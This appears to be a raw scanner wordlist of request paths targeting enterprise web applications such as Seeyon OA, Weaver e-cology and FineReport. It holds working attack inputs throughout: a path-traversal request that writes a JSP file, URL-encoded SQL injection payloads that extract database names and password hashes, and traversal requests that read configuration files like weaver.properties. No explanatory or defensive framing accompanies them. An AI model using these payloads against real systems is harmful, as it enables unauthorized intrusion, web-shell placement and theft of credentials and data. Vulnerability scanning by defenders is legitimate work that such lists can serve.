/data/sys-common/treexml.tmpl
/seeyon/wpsAssistServlet?flag=save&realFileType=../../../../ApacheJetspeed/webapps/ROOT/debugggg.jsp&fileId=2
/login/VerifyGDLogin.jsp?para1=1&para2=2
/api/encrypt/secondauthsetting/saveCAAuth
/ReportServer?op=fr_server&cmd=sc_getconnectioninfo
/WebReport/ReportServer?op=fr_server&cmd=sc_getconnectioninfo
/CRMtable/PublicPage/CustomerLogin.aspx?id=1%27%20AND%201840%20IN%20%28SELECT%20%28CHAR%28113%29%2BCHAR%28113%29%2BCHAR%28118%29%2BCHAR%28122%29%2BCHAR%28113%29%2B%28SELECT%20TOP%201%20SUBSTRING%28%28ISNULL%28CAST%28name%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%29%2C1%2C1024%29%20FROM%20master..sysdatabases%20WHERE%20ISNULL%28CAST%28name%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%20NOT%20IN%20%28SELECT%20TOP%202%20ISNULL%28CAST%28name%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%20FROM%20master..sysdatabases%20ORDER%20BY%20name%29%20ORDER%20BY%20name%29%2BCHAR%28113%29%2BCHAR%28107%29%2BCHAR%28113%29%2BCHAR%28112%29%2BCHAR%28113%29%29%29--%20OlrO
/Api/portal/elementEcodeAddon/getSqlData?sql=select%20substring(sys.fn_sqlvarbasetostr(hashbytes(
/Api/portal/elementEcodeAddon/getSqlData?sql=
/pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(HashBytes(
/mysql_config.ini
/iweboffice/officeserver.php?OPTION=LOADFILE&FILENAME=../mysql_config.ini
/weaver/weaver.file.SignatureDownLoad?markId=0%20union%20select%20%27../ecology/WEB-INF/prop/weaver.properties%27
/portal/SptmForPortalThumbnail.jsp?preview=portal/SptmForPortalThumbnail.jsp
/UserSelect/
/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5({{randstr}}))
/mainpage/msg.aspx?user=1
/mainpage/msglog.aspx?user=1
